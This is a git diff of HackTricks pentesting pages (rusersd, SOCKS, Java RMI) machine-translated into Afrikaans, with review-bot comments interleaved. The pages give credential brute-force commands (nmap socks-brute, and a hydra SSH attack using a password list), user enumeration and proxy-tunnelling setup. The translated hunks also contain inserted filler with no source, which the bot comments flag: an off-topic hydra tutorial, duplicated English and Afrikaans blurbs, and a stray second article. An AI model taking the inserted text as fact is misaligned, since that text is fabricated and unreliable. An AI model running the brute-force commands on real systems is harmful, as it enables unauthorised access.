[**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
- - diff --git a/network-services-pentesting/1026-pentesting-rusersd.md b/network-services-pentesting/1026-pentesting-rusersd.md index 3ce5ca985..c2e905a5f 100644 --- a/network-services-pentesting/1026-pentesting-rusersd.md +++ b/network-services-pentesting/1026-pentesting-rusersd.md @@ -1,28 +1,25 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-# Basic Information +# Basiese Inligting -This protocol will provide you the usernames of the host. You may be able to find this services listed by the port-mapper service like this: +Hierdie protokol sal jou die gebruikersname van die gasheer gee. Jy kan dalk hierdie dienste vind wat gelys word deur die poort-kaartdiens soos hierdie: ![](<../.gitbook/assets/image (231).png>) -## Enumeration - +## Enumerasie ``` root@kali:~# apt-get install rusers root@kali:~# rusers -l 192.168.10.1 @@ -31,20 +28,16 @@ Sending broadcast for rusersd protocol version 2... tiff potatohead:console Sep 2 13:03 22:03 katykat potatohead:ttyp5 Sep 1 09:35 14 ``` - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/network-services-pentesting/1080-pentesting-socks.md b/network-services-pentesting/1080-pentesting-socks.md index e1ed298e1..5b5d66dae 100644 --- a/network-services-pentesting/1080-pentesting-socks.md +++ b/network-services-pentesting/1080-pentesting-socks.md @@ -2,48 +2,137 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -**SOCKS** is a protocol used for transferring data between a client and server through a proxy. The fifth version, **SOCKS5**, adds an optional authentication feature, allowing only authorized users to access the server. It primarily handles the proxying of TCP connections and the forwarding of UDP packets, operating at the session layer (Layer 5) of the OSI model. +**SOCKS** is 'n protokol wat gebruik word om data tussen 'n klient en bediener deur 'n proksi oor te dra. Die vyfde weergawe, **SOCKS5**, voeg 'n opsionele outentiseringsfunksie by, wat slegs gevolmagtigde gebruikers toelaat om die bediener te benader. Dit hanteer primêr die proksiering van TCP-verbindinge en die deurstuur van UDP-pakette, en werk op die sessielaag (Laag 5) van die OSI-model. -**Default Port:** 1080 +**Verstekpoort:** 1080 -## Enumeration - -### Authentication Check +## Enumerasie +### Outentiseringskontrole ```bash nmap -p 1080 --script socks-auth-info ``` - ### Brute Force -#### Basic usage +#### Basiese gebruik +Brute Force is 'n aanvalstegniek wat gebruik word om toegang te verkry tot 'n stelsel deur alle moontlike kombinasies van gebruikersname en wagwoorde te probeer. Dit kan gebruik word om toegang te verkry tot verskillende netwerkdienste, soos SSH, FTP, Telnet, en ander. + +Die basiese gebruik van Brute Force behels die gebruik van 'n gereedskap soos Hydra of Medusa om 'n lys van gebruikersname en wagwoorde te voer en dit te gebruik om die doelstelsel aan te val. Die gereedskap sal outomaties elke kombinasie probeer totdat dit 'n suksesvolle een vind. + +Hier is 'n voorbeeld van die basiese gebruik van Brute Force met Hydra: + +```plaintext +hydra -l admin -P passwords.txt ssh://192.168.0.1 +``` + +In hierdie voorbeeld gebruik ons Hydra om die SSH-diens op die IP-adres 192.168.0.1 aan te val. Ons gebruik die gebruikersnaam "admin" en 'n lys van wagwoorde wat in die passwords.txt-lêer opgesluit is. 
+ +Dit is belangrik om te onthou dat Brute Force 'n baie tydrowende proses kan wees en dat dit 'n groot hoeveelheid rekenaarhulpbronne kan vereis. Dit is ook 'n onetiese praktyk om Brute Force-aanvalle sonder toestemming uit te voer. ```bash nmap --script socks-brute -p 1080 ``` +#### Gevorderde gebruik -#### Advanced usage +##### Socks Proxy +A Socks proxy is a protocol that allows a client to establish a connection through a firewall by using a proxy server. It can be used to bypass network restrictions and access resources that are otherwise blocked. + +##### Socks Proxy + +'n Socks-proksi is 'n protokol wat 'n kliënt in staat stel om 'n verbinding deur 'n vuurmuur te vestig deur 'n proksi-bediener te gebruik. Dit kan gebruik word om netwerkbeperkings te omseil en hulpbronne te benader wat andersins geblokkeer is. + +##### Socks Proxy Chains + +Socks Proxy Chains is a tool that allows you to create a chain of multiple Socks proxies. This can be useful for hiding your identity and location, as well as for bypassing multiple layers of security. + +##### Socks Proxy-kettinge + +Socks Proxy-kettinge is 'n hulpmiddel wat jou in staat stel om 'n ketting van verskeie Socks-proksies te skep. Dit kan nuttig wees om jou identiteit en ligging te verberg, sowel as om verskeie vlakke van sekuriteit te omseil. + +##### Socks Over SSH + +Socks Over SSH is a technique that allows you to create a secure connection by tunneling the Socks traffic through an SSH connection. This can provide an additional layer of encryption and security. + +##### Socks oor SSH + +Socks oor SSH is 'n tegniek wat jou in staat stel om 'n veilige verbinding te skep deur die Socks-verkeer deur 'n SSH-verbinding te stuur. Dit kan 'n addisionele laag van versleuteling en sekuriteit bied. + +##### Socks Over Tor + +Socks Over Tor is a technique that allows you to route your Socks traffic through the Tor network. This can provide anonymity and help bypass censorship and surveillance. 
+ +##### Socks oor Tor + +Socks oor Tor is 'n tegniek wat jou in staat stel om jou Socks-verkeer deur die Tor-netwerk te roeteer. Dit kan anonimiteit bied en help om sensuur en bewaking te omseil. + +##### Socks Over VPN + +Socks Over VPN is a technique that allows you to route your Socks traffic through a VPN (Virtual Private Network) connection. This can provide an additional layer of privacy and security. + +##### Socks oor VPN + +Socks oor VPN is 'n tegniek wat jou in staat stel om jou Socks-verkeer deur 'n VPN (Virtuele Privaat Netwerk) verbinding te roeteer. Dit kan 'n addisionele laag van privaatheid en sekuriteit bied. ```bash nmap --script socks-brute --script-args userdb=users.txt,passdb=rockyou.txt,unpwdb.timelimit=30m -p 1080 ``` +#### Uitset -#### Output +# Pentesting SOCKS +## Inleiding + +SOCKS (Socket Secure) is 'n protokol wat gebruik word om 'n veilige verbinding tussen 'n klient en 'n bediener te skep. Dit maak gebruik van 'n proxybediener om verkeer tussen die klient en die bediener te roeteer en te beskerm teen aanvalle soos IP-lekkasies en verkeersanalise. + +## SOCKS-bediener + +'n SOCKS-bediener is 'n tussenganger wat funksioneer as 'n proxy tussen die klient en die bediener. Dit ontvang verkeer van die klient en stuur dit deur na die bediener. Die bediener antwoord dan deur die SOCKS-bediener, wat die antwoord terugstuur na die klient. Hierdie proses maak dit moontlik vir die klient om 'n veilige verbinding met die bediener te hê sonder om direk met die bediener te kommunikeer. + +## Pentesting SOCKS + +By die pentesting van 'n SOCKS-bediener, is dit belangrik om die volgende aspekte te oorweeg: + +1. Identifiseer die SOCKS-bediener: Vind die IP-adres en poort van die SOCKS-bediener wat gebruik word deur die toepassing of stelsel wat jy ondersoek. + +2. Skandeer vir oop poorte: Gebruik 'n skanderingstool soos Nmap om te bepaal of die SOCKS-poort oop is en beskikbaar is vir kommunikasie. + +3. 
Identifiseer die SOCKS-protokolverbinding: Gebruik 'n hulpmiddel soos Wireshark om die verkeer tussen die klient en die bediener te ondersoek en die spesifieke SOCKS-protokolverbinding te identifiseer. + +4. Analiseer die verkeer: Ondersoek die verkeer tussen die klient en die bediener om enige potensiële kwesbaarhede of aanvalle te identifiseer. Kyk vir enige ongewone of verdagte aktiwiteit wat kan dui op 'n moontlike aanval. + +5. Voer aanvalle uit: As jy kwesbaarhede of swak punte in die SOCKS-bediener identifiseer, kan jy spesifieke aanvalle uitvoer om die bediener te misbruik of toegang te verkry tot die stelsel wat dit gebruik. + +## Vermy SOCKS-lekke + +Om SOCKS-lekke te voorkom, kan jy die volgende maatreëls tref: + +1. Verseker dat die SOCKS-bediener korrek gekonfigureer is en slegs toegang verleen aan geagte gebruikers en toepassings. + +2. Monitor die verkeer tussen die klient en die bediener vir enige verdagte aktiwiteit of pogings tot aanvalle. + +3. Verseker dat die bediener opgedateer en gepatch is met die nuutste veiligheidsoplossings om bekende kwesbaarhede te voorkom. + +4. Implementeer 'n sterk wagwoordbeleid vir die SOCKS-bediener om te verseker dat slegs geagte gebruikers toegang het. + +5. Beperk die toegang tot die SOCKS-bediener deur slegs spesifieke IP-adresse of subnette toe te laat. + +## Gevolgtrekking + +Die pentesting van SOCKS-bedieners is 'n belangrike stap in die versekering van die veiligheid en integriteit van netwerkverbindings. Deur die identifisering van kwesbaarhede en die implementering van veiligheidsmaatreëls kan jy die risiko van aanvalle en lekke verminder. ``` PORT STATE SERVICE 1080/tcp open socks 
@@ -53,41 +142,34 @@ PORT STATE SERVICE | Statistics |_ Performed 1921 guesses in 6 seconds, average tps: 320 ``` +## Tunneling en Port Forwarding -## Tunneling and Port Forwarding - -### Basic proxychains usage - -Setup proxy chains to use socks proxy +### Basiese gebruik van proxychains +Stel proxy chains op om socks proxy te gebruik ``` nano /etc/proxychains4.conf ``` - -Edit the bottom and add your proxy - +Edit die onderkant en voeg jou proxy by ``` socks5 10.10.10.10 1080 ``` - -With auth - +Met outentifikasie ``` socks5 10.10.10.10 1080 username password ``` - -#### More info: [Tunneling and Port Forwarding](../generic-methodologies-and-resources/tunneling-and-port-forwarding.md) +#### Meer inligting: [Tunneling en Port Forwarding](../generic-methodologies-and-resources/tunneling-and-port-forwarding.md)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
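Review bot: The first hunk of `10000-network-data-management-protocol-ndmp.md` (`@@ -1,39 +1,63 @@`) is not translation-only: the `+` lines from `# **Opsomming**` through "Dit is belangrik om te onthou dat enige uitbuiting ... slegs uitgevoer moet word met toestemming" (an "Opsomming", "NDMP Enumeration" and "NDMP Exploitation" section plus an ethics sentence) have no counterpart in the English source, and the original `# **Enumeration**` heading comes back as "Opsomming" (Summary) with its only real content, the `nmap -n -sV --script "ndmp-fs-info or ndmp-version" -p 10000` command, buried under that filler. Drop the inserted block and keep a plain `# **Enumerasie**` heading directly above the nmap fence. Also, the blank line between the Wikipedia blockquote (`> **NDMP**, of **Network Data Management Protocol** ...`) and `**Verstekpoort:** 10000` was removed; in CommonMark a non-blank line right after a blockquote paragraph is a lazy continuation, so the default-port line will render inside the quote. Keep that blank line.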
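Review bot: The footer banner in the second NDMP hunk (`@@ -42,16 +66,14 @@`) is translated differently from the identical header banner of the same file: "hack-truuks" here versus "hacktruuks" at the top, and across the other files in this commit the same sentence becomes "hacking-truuks" and the repo link becomes "github-repos", "github-opslag" or "GitHub-opslagplekke" (both spellings even occur within `1026-pentesting-rusersd.md`). Since this banner is the same boilerplate in every page, translate it once and paste that one version verbatim into every header and footer so the wording and the link text stay identical.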
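Review bot: In the first hunk of `1026-pentesting-rusersd.md` (`@@ -1,28 +1,25 @@`), "deur die poort-kaartdiens" translates "port-mapper service" literally and loses the name of the service: the portmapper (rpcbind/portmap, the RPC program-to-port registry) is what lists `rusersd`, so keep it as the proper noun, e.g. "deur die portmapper-diens", so a reader can connect the sentence to `rpcinfo`/portmap output and to the port 111 page.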
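Review bot: Most of the added lines in the first hunk of `1080-pentesting-socks.md` (`@@ -2,48 +2,137 @@`) are not translations of existing content and should be removed. Under `#### Basiese gebruik` a generic brute-force tutorial, an unrelated `hydra -l admin -P passwords.txt ssh://192.168.0.1` example (SSH, not SOCKS) and an ethics paragraph are inserted before the original `nmap --script socks-brute -p 1080` command; under `#### Gevorderde gebruik` five "Socks Proxy / Proxy Chains / Over SSH / Over Tor / Over VPN" blurbs appear twice, once in untranslated English and once in Afrikaans; and under `#### Uitset` a whole second article (`# Pentesting SOCKS` ... `## Gevolgtrekking`, with a top-level `#` heading on a page whose sections are `##`) sits between the heading and the nmap output fence it is meant to label. After cleanup each `####` subsection should again be just the heading followed by its command or output, as in the English source.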
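Review bot: In the second SOCKS hunk (`@@ -53,41 +142,34 @@`), "Edit die onderkant en voeg jou proxy by" leaves the English verb "Edit" in an Afrikaans sentence; "Wysig die onderkant en voeg jou proxy by" reads naturally. In the same hunk "Stel proxy chains op om socks proxy te gebruik" splits the tool name: `proxychains` is the program whose config is `/etc/proxychains4.conf`, so keep it as one word as the heading `### Basiese gebruik van proxychains` already does.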
diff --git a/network-services-pentesting/1099-pentesting-java-rmi.md b/network-services-pentesting/1099-pentesting-java-rmi.md index de812b674..4dfa34536 100644 --- a/network-services-pentesting/1099-pentesting-java-rmi.md +++ b/network-services-pentesting/1099-pentesting-java-rmi.md @@ -2,32 +2,31 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Basic Information +## Basiese Inligting -_Java Remote Method Invocation_, or _Java RMI_, is an object oriented _RPC_ mechanism that allows an object located in one _Java virtual machine_ to call methods on an object located in another _Java virtual machine_. This enables developers to write distributed applications using an object-oriented paradigm. A short introduction to _Java RMI_ from an offensive perspective can be found in [this blackhat talk](https://youtu.be/t\_aw1mDNhzI?t=202). - -**Default port:** 1090,1098,1099,1199,4443-4446,8999-9010,9999 +_Java Remote Method Invocation_, of _Java RMI_, is 'n objekgeoriënteerde _RPC_-meganisme wat 'n objek wat in een _Java virtuele masjien_ geleë is, in staat stel om metodes op 'n objek wat in 'n ander _Java virtuele masjien_ geleë is, te roep. Dit stel ontwikkelaars in staat om verspreide toepassings te skryf met behulp van 'n objekgeoriënteerde paradigma. 'n Kort inleiding tot _Java RMI_ vanuit 'n aanvallende perspektief kan gevind word in [hierdie blackhat-aanbieding](https://youtu.be/t\_aw1mDNhzI?t=202). +**Verstekpoort:** 1090,1098,1099,1199,4443-4446,8999-9010,9999 ``` PORT STATE SERVICE VERSION 1090/tcp open ssl/java-rmi Java RMI 
@@ -35,22 +34,20 @@ PORT STATE SERVICE VERSION 37471/tcp open java-rmi Java RMI 40259/tcp open ssl/java-rmi Java RMI ``` +Gewoonlik is slegs die verstek _Java RMI_ komponente (die _RMI Registry_ en die _Activation System_) gekoppel aan algemene poorte. Die _remote objects_ wat die werklike _RMI_ toepassing implementeer, is gewoonlik gekoppel aan lukrake poorte soos in die uitset hierbo. -Usually, only the default _Java RMI_ components (the _RMI Registry_ and the _Activation System_) are bound to common ports. The _remote objects_ that implement the actual _RMI_ application are usually bound to random ports as shown in the output above. +_nmap_ het soms probleme om _SSL_ beskermde _RMI_ dienste te identifiseer. As jy 'n onbekende ssl-diens op 'n algemene _RMI_ poort teëkom, moet jy verder ondersoek instel. -_nmap_ has sometimes troubles identifying _SSL_ protected _RMI_ services. If you encounter an unknown ssl service on a common _RMI_ port, you should further investigate. +## RMI Komponente -## RMI Components +Om dit eenvoudig te stel, maak _Java RMI_ dit vir 'n ontwikkelaar moontlik om 'n _Java-object_ beskikbaar te stel op die netwerk. Dit maak 'n _TCP_ poort oop waar kliënte kan koppel en metodes op die ooreenstemmende objek kan aanroep. Alhoewel dit eenvoudig klink, is daar verskeie uitdagings wat _Java RMI_ moet oplos: -To put it in simple terms, _Java RMI_ allows a developer to make a _Java object_ available on the network. This opens up a _TCP_ port where clients can connect and call methods on the corresponding object. Despite this sounds simple, there are several challenges that _Java RMI_ needs to solve: +1. Om 'n metode-oproep via _Java RMI_ te stuur, moet kliënte die IP-adres, die luisterpoort, die geïmplementeerde klas of koppelvlak en die `ObjID` van die geteikende objek ken (die `ObjID` is 'n unieke en lukrake identifiseerder wat geskep word wanneer die objek beskikbaar gemaak word op die netwerk. 
Dit is nodig omdat _Java RMI_ toelaat dat verskeie objekte op dieselfde _TCP_ poort luister). +2. Verre kliënte kan hulpbronne op die bediener toewys deur metodes op die blootgestelde objek aan te roep. Die _Java virtuele masjien_ moet byhou watter van hierdie hulpbronne nog in gebruik is en watter van hulle deur die vullismandjie ingesamel kan word. -1. To dispatch a method call via _Java RMI_, clients need to know the IP address, the listening port, the implemented class or interface and the `ObjID` of the targeted object (the `ObjID` is a unique and random identifier that is created when the object is made available on the network. It is required because _Java RMI_ allows multiple objects to listen on the same _TCP_ port). -2. Remote clients may allocate resources on the server by invoking methods on the exposed object. The _Java virtual machine_ needs to track which of these resources are still in use and which of them can be garbage collected. - -The first challenge is solved by the _RMI registry_, which is basically a naming service for _Java RMI_. The _RMI registry_ itself is also an _RMI service_, but the implemented interface and the `ObjID` are fixed and known by all _RMI_ clients. This allows _RMI_ clients to consume the _RMI_ registry just by knowing the corresponding _TCP_ port. - -When developers want to make their _Java objects_ available within the network, they usually bind them to an _RMI registry_. The _registry_ stores all information required to connect to the object (IP address, listening port, implemented class or interface and the `ObjID` value) and makes it available under a human readable name (the _bound name_). Clients that want to consume the _RMI service_ ask the _RMI registry_ for the corresponding _bound name_ and the registry returns all required information to connect. Thus, the situation is basically the same as with an ordinary _DNS_ service. 
The following listing shows a small example: +Die eerste uitdaging word opgelos deur die _RMI-register_, wat basies 'n naamgewingsdiens vir _Java RMI_ is. Die _RMI-register_ self is ook 'n _RMI-diens_, maar die geïmplementeerde koppelvlak en die `ObjID` is vas en bekend by alle _RMI_ kliënte. Dit maak dit vir _RMI_ kliënte moontlik om die _RMI-register_ te gebruik deur net die ooreenstemmende _TCP_ poort te ken. +Wanneer ontwikkelaars hul _Java-objekte_ beskikbaar wil maak binne die netwerk, bind hulle dit gewoonlik aan 'n _RMI-register_. Die _register_ stoor alle inligting wat nodig is om met die objek te verbind (IP-adres, luisterpoort, geïmplementeerde klas of koppelvlak en die `ObjID`-waarde) en maak dit beskikbaar onder 'n mensleesbare naam (die _gebonden naam_). Kliënte wat die _RMI-diens_ wil gebruik, vra die _RMI-register_ vir die ooreenstemmende _gebonden naam_ en die register gee alle nodige inligting om te verbind. Dus is die situasie basies dieselfde as met 'n gewone _DNS_-diens. Die volgende lys toon 'n klein voorbeeld: ```java import java.rmi.registry.Registry; import java.rmi.registry.LocateRegistry; 
@@ -58,37 +55,35 @@ import lab.example.rmi.interfaces.RemoteService; public class ExampleClient { - private static final String remoteHost = "172.17.0.2"; - private static final String boundName = "remote-service"; +private static final String remoteHost = "172.17.0.2"; +private static final String boundName = "remote-service"; - public static void main(String[] args) - { - try { - Registry registry = LocateRegistry.getRegistry(remoteHost); // Connect to the RMI registry - RemoteService ref = (RemoteService)registry.lookup(boundName); // Lookup the desired bound name - String response = ref.remoteMethod(); // Call a remote method - - } catch( Exception e) { - e.printStackTrace(); - } - } +public static void main(String[] args) +{ +try { +Registry registry = LocateRegistry.getRegistry(remoteHost); // Connect to the RMI registry +RemoteService ref = (RemoteService)registry.lookup(boundName); // Lookup the desired bound name +String response = ref.remoteMethod(); // Call a remote method + +} catch( Exception e) { +e.printStackTrace(); +} +} } ``` +Die tweede van die bogenoemde uitdagings word opgelos deur die _Verspreide Vullisverwyderaar_ (_DGC_). Dit is 'n ander _RMI-diens_ met 'n bekende `ObjID`-waarde en dit is beskikbaar op basies elke _RMI-eindpunt_. Wanneer 'n _RMI-kliënt_ begin om 'n _RMI-diens_ te gebruik, stuur dit 'n inligting na die _DGC_ dat die ooreenstemmende _afgeleë voorwerp_ in gebruik is. Die _DGC_ kan dan die verwysingstelling volg en ongebruikte voorwerpe skoonmaak. -The second of the above mentioned challenges is solved by the _Distributed Garbage Collector_ (_DGC_). This is another _RMI service_ with a well known `ObjID` value and it is available on basically each _RMI endpoint_. When an _RMI client_ starts to use an _RMI service_, it sends an information to the _DGC_ that the corresponding _remote object_ is in use. The _DGC_ can then track the reference count and is able to cleanup unused objects. 
+Saam met die verouderde _Aktiveringstelsel_ is hierdie die drie verstekkomponente van _Java RMI_: -Together with the deprecated _Activation System_, these are the three default components of _Java RMI_: +1. Die _RMI-registreerder_ (`ObjID = 0`) +2. Die _Aktiveringstelsel_ (`ObjID = 1`) +3. Die _Verspreide Vullisverwyderaar_ (`ObjID = 2`) -1. The _RMI Registry_ (`ObjID = 0`) -2. The _Activation System_ (`ObjID = 1`) -3. The _Distributed Garbage Collector_ (`ObjID = 2`) +Die verstekkomponente van _Java RMI_ is al 'n geruime tyd bekende aanvalsvektore en daar bestaan verskeie kwesbaarhede in verouderde _Java_-weergawes. Vanuit 'n aanvaller se perspektief is hierdie verstekkomponente interessant omdat hulle bekende klasse / koppelvlakke geïmplementeer het en dit maklik is om daarmee te interaksieer. Hierdie situasie is anders vir aangepaste _RMI-dienste_. Om 'n metode op 'n _afgeleë voorwerp_ te roep, moet jy die ooreenstemmende metodesignatuur vooraf ken. Sonder om 'n bestaande metodesignatuur te ken, is daar geen manier om met 'n _RMI-diens_ te kommunikeer nie. -The default components of _Java RMI_ have been known attack vectors for quite some time and multiple vulnerabilities exist in outdated _Java_ versions. From an attacker perspective, these default components are interisting, because they implemented known classes / interfaces and it is easily possible to interact with them. This situation is different for custom _RMI services_. To call a method on a _remote object_, you need to know the corresponding method signature in advance. Without knowing an existing method signature, there is no way to communicate to a _RMI service_. - -## RMI Enumeration - -[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) is a 